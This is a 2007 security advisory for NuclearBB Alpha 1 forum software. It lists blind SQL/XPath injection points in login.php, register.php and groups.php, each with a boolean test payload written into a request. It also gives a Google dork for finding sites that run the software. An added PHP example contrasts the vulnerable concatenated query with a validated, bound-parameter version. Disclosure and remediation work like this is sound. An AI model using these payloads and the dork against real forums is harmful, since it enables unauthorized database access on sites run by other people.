NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1

Google d0rk: "This forum is powered by NuclearBB"

=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xxxxxxx"+and+"1"="0
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx
pass1=xyz@xxxxxxx
pass2=xyz@xxxxxxx
website=xyz@xxxxxxx
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx"+and+"1"="0
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx
pass1=xyz@xxxxxxx
pass2=xyz@xxxxxxx
website=xyz@xxxxxxx
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx+and+1=0
pass1=xyz@xxxxxxx
pass2=xyz@xxxxxxx
website=xyz@xxxxxxx
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx
coppa_state=over&register_submit=Register

John Martinelli
john@xxxxxxxxxxxxxx
http://john-martinelli.com

April 18th, 2007
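
Added example, not part of the original advisory and not NuclearBB source: a regression check for the numeric case (groups.php, $_GET['g']) showing why the appended condition changes the result when the value is concatenated into the query, and how integer validation plus a bound parameter removes that difference. The forum_groups table, its columns and both function names are hypothetical; an in-memory SQLite database stands in for the forum's real database.

```php
<?php
// Added example: NOT NuclearBB code. Table, columns and function names are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE forum_groups (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO forum_groups (id, name) VALUES (1, 'Members')"); // constructed sample row

// Vulnerable pattern: the request value is concatenated into a numeric context,
// so anything after the number is parsed as part of the WHERE clause.
function group_names_concat(PDO $pdo, string $g): array
{
    $sql = 'SELECT name FROM forum_groups WHERE id = ' . $g;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: accept only an integer, then bind it as a typed parameter.
// Returns null for anything that is not an integer (caller should answer HTTP 400).
function group_names_bound(PDO $pdo, string $g): ?array
{
    $id = filter_var($g, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT name FROM forum_groups WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Baseline value and the URL-decoded value of g from the advisory.
$cases = ['1', '1 and 1=0'];
foreach ($cases as $g) {
    $concat = count(group_names_concat($pdo, $g));
    $bound  = group_names_bound($pdo, $g);
    printf(
        "g=%-12s concat rows=%d  bound=%s\n",
        var_export($g, true),
        $concat,
        $bound === null ? 'rejected' : 'rows=' . count($bound)
    );
}
```

With concatenation the row count differs between the two inputs, which is the behaviour a blind injection test relies on; the bound version rejects the second input before it reaches the database. The string inputs listed above are closed off the same way, by binding the value as a string parameter rather than quoting it into the SQL text.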